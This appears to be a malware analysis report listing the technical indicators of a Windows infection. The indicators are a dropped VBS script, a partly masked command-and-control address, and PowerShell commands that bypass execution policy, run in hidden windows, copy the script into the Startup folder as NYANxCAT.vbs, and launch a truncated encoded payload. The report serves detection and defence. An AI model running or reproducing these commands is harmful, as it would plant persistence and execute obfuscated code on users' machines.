Technical Information
- %TEMP%\2c7.tmp\2d8.vbs
- %TEMP%\2c7.tmp\2d8.vbs
- '19#.#61.193.99':29742
- '<SYSTEM32>\wscript.exe' %TEMP%\2C7.tmp\2D8.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -window 1 Copy-Item '%TEMP%\2C7.tmp\2D8.vbs' '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\NYANxCAT.vbs';
- '<SYSTEM32>\wscript.exe' %TEMP%\2C7.tmp\2D8.vbs' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -window 1 Copy-Item '%TEMP%\2C7.tmp\2D8.vbs' '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\NYANxCAT.vbs';' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4A...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4A...